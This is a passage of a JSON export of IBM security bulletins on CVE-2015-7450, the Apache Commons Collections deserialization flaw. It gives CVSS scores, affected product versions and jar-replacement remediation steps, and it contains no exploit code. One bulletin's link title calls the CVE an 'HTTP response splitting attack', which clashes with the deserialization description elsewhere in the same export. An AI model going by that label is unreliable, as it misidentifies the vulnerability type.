\n3\\. Navigate to the following directory inside the installation directory: \n \nusr/servers/RTCPServer/apps/ \n \n4\\. Delete the directory called \"RTCP.war\". \n \n5\\. Restore the directory called \"RTCP.war\" from the safe backup location that you copied it to in step 10 of the fix's installation instructions. \n \n6\\. Go to the Rational Test Control Panel workspace. \n \nOn Windows this is usually: \n \nC:\\IBM\\RTCP-Workspace\\ \n \nOn AIX, Linux and Solaris this is usually: \n \n/var/RTCP/ \n \n7\\. Restore files that you copied in step 5 of the fix's installation instructions back from the safe backup location. \n \n**General notes:** \nWhen updating an installation to a later version of Rational Test Control Panel, check the later version's release notes to verify that this fix has been included in that version. This fix is not appropriate for any versions other than the exact ones specified in this fix's installation instructions. \n \nWhen removing an installation that has had the security fix applied, IBM Installation Manager may not remove all the files, and some files may have to be removed manually. To remove those files, delete the Rational Test Control Panel installation directory after the uninstallation process in IBM Installation Manager has been completed. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:08:13", "type": "ibm", "title": "Security Bulletin: Vulnerability in Spring Framework for Java Deserialization in Rational Test Control Panel in Rational Test Workbench and Rational Test Virtualization Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T05:08:13", "id": "0A096E5B1166FA9EA2FBE248B1FBD4328C1A90DC4203B8F0EE373BED1B836904", "href": "https://www.ibm.com/support/pages/node/274789", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:48", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by Rational Integration Tester in Rational Test Workbench, Rational Test Control Panel in Rational Test Workbench and Rational Test Virtualization Server, and RIT Agent in Rational Test Virtualization Server and Rational Performance Test Server (see CVE-2015-7450).\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Rational Integration Tester** component in Rational Test Workbench,** Rational Test Control Panel **component in Rational Test Workbench and Rational Test Virtualization Server, and** RIT Agent **in Rational Test Virtualization Server and Rational Performance Test Server versions: \n \nAll versions from **8.0** up to and including **8.7.1**\n\n## Remediation/Fixes\n\nThe fixes for the CVE(s) mentioned above have been incorporated into an interim fix available on Fix Central (<http://www-933.ibm.com/support/fixcentral/>). \n \nPlease follow the appropriate component instructions below: \n \n**Note: OS X Instructions are provided for version 8.7.1 only** \n \n**Rational Test Control Panel (RTCP)**** **component in Rational Test Workbench (RTW) and Rational Test Virtualization Server (RTVS) \n1\\. Download the fix from Fix Central and unzip it to extract the library **_commons-collections-3.2.2.jar_** \n2\\. Stop the server \n3\\. For versions 8.0 to 8.5.0.x \no Delete the existing library 'commons-collections-3.2.1.jar' in RationalTestControlPanel/ webapps/RTCP/WEB-INF/lib and replace it with 'commons-collections-3.2.2.jar' \n4\\. For versions 8.5.1.x to 8.7.1 \no Delete the existing library 'commons-collections-3.2.1.jar' in RationalTestControlPanel/usr/servers/RTCPServer/apps/RTCP.war/WEB-INF/lib and replace it with 'commons-collections-3.2.2.jar' \n5\\. Start the server \n \n**Note:** The default install location for RTCP is opt/IBM/RationalTestControlPanel on AIX, Linux and Solaris, /Applications/IBM/RationalTestControlPanel on OS X (8.7.1 only) and C:\\Program Files\\IBM\\RationalTestControlPanel on Windows. \n \n \n**Rational Integration Tester (RIT) **component in Rational Test Workbench (RTW) \n\n1\\. Download the fix from Fix Central and unzip it to a directory.\n\nFor versions 8.7.0.x and before, use **_com.springsource.org.apache.commons.collections_3.2.2.jar_**.\n\nFor version 8.7.1, use **_org.apache.commons_****_._****_collections_3.2.2.jar_**.\n\n2\\. Close any running instances of Rational Integration Tester (and RIT Agent if installed on the same machine).\n\n3\\. Locate the **IBMIMShared** directory.\n\n4\\. Copy the appropriate file into the **IBMIMShared\\plugins** directory.\n\n5\\. Locate the \u201cbundles.info\u201d file. By default, the location of this file is:\n\n_{__Installation Directory for RIT}\\configuration\\org.eclipse.equinox.simpleconfigurator_\n\n6\\. In the bundles.info file, find the line that references Commons Collections (search for commons.collections) and replace it with the appropriate option below: \n\n**For versions 8.7.0.x and before:**\n\ncom.springsource.org.apache.commons.collections,3.2.2,../IBMIMShared/plugins/com.springsource.org.apache.commons.collections_3.2.2.jar,4,false\n\n**For version 8.7.1:**\n\norg.apache.commons.collections,3.2.2,../IBMIMShared/plugins/org.apache.commons.collections_3.2.2.jar,4,false\n\n7\\. In order to verify that the changes have been made successfully, re-start RIT from the command line with the following command:\n\n**GHTester.exe \u2013clean \u2013console**\n\nWhen the console window appears, verify that 3.2.2 not 3.2.1 is shown when you type:\n\n**ss apache.commons.collections**\n\n**Note:** The default location for the IBMIMShared Directory is /Applications/IBM/IBMIMShared on OS X, opt/ibm/IBMIMShared on AIX, Linux and Solaris, and C:\\Program Files\\IBM\\IBMIMShared on Windows.\n\n \n\n\n**Rational Integration Tester Agent (RIT Agent) **component in Rational Test Virtualization Server (RTVS) and Rational Performance Test Server (RPTS)\n\n1\\. Download the fix from Fix Central and unzip it to a directory.\n\nFor versions 8.7.0.x and before, use **_com.springsource.org.apache.commons.collections_3.2.2.jar_**.\n\nFor version 8.7.1, use **_org.apache.commons_****_._****_collections_3.2.2.jar_**.\n\n1\\. Close any running instances of RIT Agent (and Rational Integration Tester if installed on the same machine).\n\n2\\. Locate the **IBMIMShared** directory.\n\n3\\. Copy the unzipped file to the **IBMIMShared\\plugins** directory.\n\n4\\. Locate the \u201cbundles.info\u201d file. By default, the location of this file is:\n\n_{__Installation Directory for RIT Agent}\\configuration\\org.eclipse.equinox.simpleconfigurator_\n\n5\\. In the bundles.info file, find the line that references Commons Collections (search for commons.collections) and replace it with the appropriate option below: \n\n**For versions 8.7.0.x and before:**\n\ncom.springsource.org.apache.commons.collections,3.2.2,../IBMIMShared/plugins/com.springsource.org.apache.commons.collections_3.2.2.jar,4,false\n\n**For version 8.7.1:**\n\norg.apache.commons.collections,3.2.2,../IBMIMShared/plugins/org.apache.commons.collections_3.2.2.jar,4,false\n\n6\\. In order to verify that the changes have been made successfully, check that RTCP is running, and then re-start the agent using the command line with the following command:\n\n**Agent.exe \u2013clean \u2013console**\n\nWhen the console window appears, verify that 3.2.2 not 3.2.1 is shown when you type:\n\n**ss apache.commons.collections**\n\n**Note:** The default location for the IBMIMShared Directory is /Applications/IBM/IBMIMShared on OS X, opt/ibm/IBMIMShared on AIX, Linux and Solaris, and C:\\Program Files\\IBM\\IBMIMShared on Windows.\n\n \n\n\n**General Notes:**\n\n \no When updating an installation to a later version of Rational Test Control Panel, Rational Integration Tester or RIT Agent, the security fix detailed above will have to be re-applied after the update \no When removing an installation that has had the security fix applied, not all the files will be removed by IBM Installation Manager, and some files will have to be removed manually \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:07:50", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects RIT and RTCP in Rational Test Workbench, RTCP and RIT Agent in Rational Test Virtualization Server, and RIT Agent in Rational Performance Test Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T05:07:50", "id": "C807C32A7883D1C2FC0D7B24C88A071FCA929D2C2A1604675B9EDBA17D0B0100", "href": "https://www.ibm.com/support/pages/node/273031", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-23T21:50:54", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Fabric Manager (IFM).\n\n## Vulnerability Details\n\n## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Fabric Manager (IFM).\n\n**Vulnerability Details:**\n\n**CVE-ID:** [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>)\n\n**Description:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system.\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <http://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nProduct | Affected Version \n---|--- \nIBM Fabric Manager | 4.1 \n \n## Remediation/Fixes:\n\nFirmware fix versions are available on Fix Central: \n<http://www.ibm.com/support/fixcentral/>.\n\nProduct | Fix Version \n---|--- \nIBM Fabric Manager \nibm_sw_ifm-4.1.04.0048_windows_32-64 \nibm_sw_ifm-4.1.04.0048_linux_32-64 | 4.1.04.0048 \n \nYou should verify applying this fix does not cause any compatibility issues.\n\n## Workarounds and Mitigations:\n\nNone.\n\n## References:\n\n * [Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide.html>)\n * [On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0>)\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n[IBM Product Security Incident Response Blog](<https://www.ibm.com/blogs/psirt/>) \n\n\n**Acknowledgement**\n\nNone.\n\n**Change History** \n17 May 2016: Original version published\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n**Disclaimer**\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-31T02:25:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Fabric Manager (IFM) (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-01-31T02:25:02", "id": "8D5E5D7EAC96534F5A79125B211C9A28A28825BCA639C4FB6E2E30BC1F7F6639", "href": "https://www.ibm.com/support/pages/node/868478", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:53:32", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, and Platform HPC.\n\n## Vulnerability Details\n\n**CVEID:** [**CVE-2015-7450**](<https://vulners.com/cve/CVE-2015-7450>)\n\n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system.CVSS Base Score: 9.8CVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current scoreCVSS Environmental Score*: UndefinedCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nPlatform Cluster Manager Standard Edition Version 4.1.0, 4.1.1 and 4.1.1.1 \n\nPlatform Cluster Manager Version 4.2.0, 4.2.0.1, 4.2.0.2 and 4.2.1\n\nPlatform HPC Version 4.1.1, 4.1.1.1, 4.2.0 and 4.2.1\n\n## Remediation/Fixes\n\nSee Workarounds\n\n## Workarounds and Mitigations\n\n**Platform Cluster Manager 4.2.x & Platform HPC 4.2.x**\n\n1\\. Download Apache Commons Collections 3.2.2 from [_http://commons.apache.org/proper/commons-collections/download_collections.cgi_](<http://commons.apache.org/proper/commons-collections/download_collections.cgi>)\n\n2\\. Extract the file commons-collections-3.2.2.jar file and copy the extracted files to the management node.\n\n3\\. Back up your existing JAR files and replace them with the Apache Commons Collections 3.2.2 files. The existing JAR files that need to be replaced, include:\n\n \n\u00b7 /opt/pcm/web-portal/perf/1.2/lib/commons-collections-3.1.jar \n\n\u00b7 /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/commons-collections-3.2.1.jar\n\n\u00b7 /opt/pcm/web-portal/docs/kc.war/WEB-INF/lib/commons-collections-3.2.1.jar\n\n\u00b7 /opt/pcm/activemq/lib/optional/commons-collections-3.2.1.jar\n\n\u00b7 /opt/pcm/pcmd/1.0/lib/external/commons-collections-3.2.1.jar\n\nIf high availability is enabled, in addition to the above files, replace the following JAR file on the standby management node.\n\n\u00b7 /opt/pcm/activemq/lib/optional/commons-collections-3.2.1.jar\n\n \n4\\. Restart services. If high availability is enabled, run the following commands on active management node: \n\n \n# pcmhatool failmode -m manual \n\n# pcmadmin service stop --group all\n\n# pcmadmin service start --group all\n\n# pcmhatool failmode -m auto\n\nOtherwise, if high availability is not enabled, run the following commands on the active management node:\n\n# pcmadmin service stop --group all\n\n# pcmadmin service start --group all\n\n \n\n\n**Platform Cluster Manager 4.1.x & Platform HPC 4.1.x**\n\n1\\. Download Apache Commons Collections 3.2.2 from [_http://commons.apache.org/proper/commons-collections/download_collections.cgi_](<http://commons.apache.org/proper/commons-collections/download_collections.cgi>)\n\n2\\. Extract the commons-collections-3.2.2.jar file and copy the extracted files to the management node.\n\n3\\. Back up your existing JAR files and replace them with the Apache Commons Collections 3.2.2 files. The existing JAR files that need to be replaced, include:\n\n \n\u00b7 /opt/pcm/web-portal/perf/1.2/lib/commons-collections-3.1.jar \n\n\u00b7 /opt/pcm /web-portal/perf/1.2/lib/commons-collections-3.2.1.jar\n\n\u00b7 /opt/pcm /web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/commons-collections-3.2 .1.jar\n\n \n4\\. Restart services. If high availability is enabled, run the following commands on active management node: \n\n \n# pcmhatool failmode -m manual \n\n# pmcadmin stop\n\n# perfadmin stop all\n\n# perfadmin start all\n\n# pmcadmin start\n\n# pcmhatool failmode -m auto\n\nOtherwise, if high availability is not enabled, run the following commands on the active management node:\n\n# pmcadmin stop\n\n# perfadmin stop all\n\n# perfadmin start all\n\n# pmcadmin start\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T01:30:16", "type": "ibm", "title": "Security Bulletin: An Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, and Platform HPC.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-18T01:30:16", "id": "EB93085B7374899EA5C0E8EA2497565106D942E650838AACC75C22BA9457AA10", "href": "https://www.ibm.com/support/pages/node/681933", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:33", "description": "## Summary\n\nA vulnerability for handling Java object deserialization in the Apache Commons Collections open source library has been reported. A vulnerable version of the library is included in templates shipped with WebSphere Industry Content Packs and IBM Business Process Manager Industry Packs.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n * WebSphere Industry Content Packs 7.0.0.0 through 7.0.0.3\n * IBM Business Process Manager Industry Packs 7.5.x\n\n## Remediation/Fixes\n\nArtifacts contained in WebSphere Industry Content Packs and IBM Business Process Manager Industry Packs can be customized and deployed on server products running on top of IBM WebSphere Application Server V7. Please review [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) and download and install the suggested fixes.\n\n## Workarounds and Mitigations\n\nWhen building your own applications based on the templates provided in WebSphere Industry Content Packs and IBM Business Process Manager Industry Packs, make sure to include the latest version of Apache Commons Collections and remove all other versions. Specifically, replace commons-collections-3.2.1.jar with commons-collections-3.2.2.jar in all existing and new applications. \n\nA patched version is available for download on Apache's proceject web site: <https://commons.apache.org/proper/commons-collections/download_collections.cgi>\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:18", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons might affect WebSphere Industry Content Packs and IBM Business Process Manager Industry Packs (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:18", "id": "15C7A0230AF3A0F0FAFE62170A4B777259233446DB9DD93795C37C15DC353BED", "href": "https://www.ibm.com/support/pages/node/273063", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:37", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of WebSphere Business Compass. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletin [HTTP response splitting attack in WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nThis vulnerability affects WebSphere Business Compass V7.0.0._x_.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:13", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with WebSphere Business Compass (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:13", "id": "213D617E4F9EE72EB68155881D93F2FB6687EAF279D0B4652098B6858AB1354A", "href": "https://www.ibm.com/support/pages/node/272359", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:55", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Tivoli Composite Application Manager Agent for Application Diagnostics\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Tivoli Composite Application Manager for Application Diagnostics 7.1 and above\n\n## Workarounds and Mitigations\n\nThe affected components are: ITCAM Agent for WebSphere Applications, ITCAM Agent for J2EE, ITCAM Agent for HTTP Servers, and the WebSphere component used in ITCAM for Application Diagnostics Managing Server. \n\n 1. The instructions to replace commons-collections-3.2.jar with commons-collections.3.2.2.jar for each agent are:\n * ITCAM Agent for WebSphere Applications: <http://www-01.ibm.com/support/docview.wss?uid=swg21972189>\n * ITCAM Agent for J2EE: <http://www.ibm.com/support/docview.wss?uid=swg21972199>\n * ITCAM Agent for HTTP Servers: <http://www.ibm.com/support/docview.wss?uid=swg21972210>\n* The WebSphere Security Bulletin can be found at: <http://www-01.ibm.com/support/docview.wss?uid=swg21970575>\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:52", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Tivoli Composite Application Manager for Application Diagnostics (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:52", "id": "76A7E7DAF9C149B8FD66E19139F6112A525F103DF32693A1F4D43F31321E1A1E", "href": "https://www.ibm.com/support/pages/node/273585", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:55", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Tivoli Storage Manager for Virtual Environments: Data Protection for VMware (IBM Spectrum Protect for Virtual Environments) and the IBM Tivoli Storage FlashCopy Manager for VMware (IBM Spectrum Protect Snapshot).\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION**: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThe following products and versions are affected: \n\n * Tivoli Storage Manager for Virtual Environments: Data Protection for VMware \n\\- 7.1.0.0 through 7.1.3.x \n\\- 6.4.0.0 through 6.4.3 \n\\- 6.3.0.0 through 6.3.2.4\n * Tivoli Storage FlashCopy Manager for VMware \n\\- 4.1.0.0 through 4.1.3.x \n\\- 3.2.0.0 through 3.2.0.5 \n\\- 3.1.0.0 through 3.1.1.2\n\n## Remediation/Fixes\n\n**_Tivoli Storage Manager for VE: Data Protection for VMware Release_**\n\n| **_First Fixing VRMF Level_**| **_ \n \nClient_** \n**_Platform_**| **_Link to Fix / Fix Availability Target_** \n---|---|---|--- \n7.1| 7.1.4| Linux \nWindows| <http://www.ibm.com/support/docview.wss?uid=swg24041094> \n6.4| 6.4.3.1| Linux \nWindows| 